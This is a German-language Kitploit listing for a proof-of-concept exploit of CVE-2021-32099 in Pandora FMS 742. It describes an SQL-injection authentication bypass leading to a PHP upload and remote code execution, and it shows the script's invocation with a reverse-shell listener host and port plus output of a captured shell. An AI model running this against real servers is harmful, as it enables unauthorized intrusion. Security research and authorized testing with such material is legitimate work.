Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-32099 — PoC für CVE-2021-32099 | Kitploit
Tools/GitHubGitHub/magicrc/cve-2021-32099
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmagicrc/cve-2021-32099

CVE-2021-32099

PoC für CVE-2021-32099

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2021-32099 PoC

Dieses Repository stellt einen Proof-of-Concept-Exploit (PoC) für die Sicherheitslücke CVE-2021-32099 bereit, die Pandora FMS 742 betrifft. Der Exploit zeigt, wie ein nicht authentifizierter Angreifer eine SQL-Injection-Schwachstelle ausnutzen kann, um eine Sitzung ohne Privilegien auf ein Administratorkonto auszuweiten. Mit administrativem Zugriff kann der Angreifer über den Pandora-FMS-Dateimanager eine beliebige PHP-Datei hochladen, was zu einer Remotecodeausführung führt und den Server als Webserver-Benutzer kompromittiert.


⚠️ HAFTUNGSAUSSCHLUSS

Dieses Projekt ist ausschließlich für Bildungs-, Forschungs- und autorisierte Sicherheitstestzwecke bestimmt.
Verwenden Sie diesen Code nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Testgenehmigung haben.
Der Autor übernimmt keine Verantwortung für Schäden oder Missbrauch.


Installation

root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt

Verwendung

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py                                                           
usage: python3 ./CVE-2021-32099.py [--target TARGET] [--lhost LHOST] [--lport LPORT]

options:
  --target TARGET  Full URL of the vulnerable Pandora FMS instance.
  --lhost LHOST    IP address where the reverse shell will connect back to (must be reachable by the target). The listener will bind to 0.0.0.0 internally.
  --lport LPORT    Port number the reverse shell listener will bind to.

Example: python3 ./CVE-2021-32099.py --target http://target.com --lhost 10.10.14.157 --lport 4444

Beispiel

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py --target http://localhost --lhost 10.10.14.81 --lport 4444
[+] Bypassing authentication...OK
[+] Uploading reverse shell...OK
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.129.177.29 on port 37308
[+] Executing reverse shell...
[*] Switching to interactive mode
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:59:07 up 17:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$  
Tool herunterladen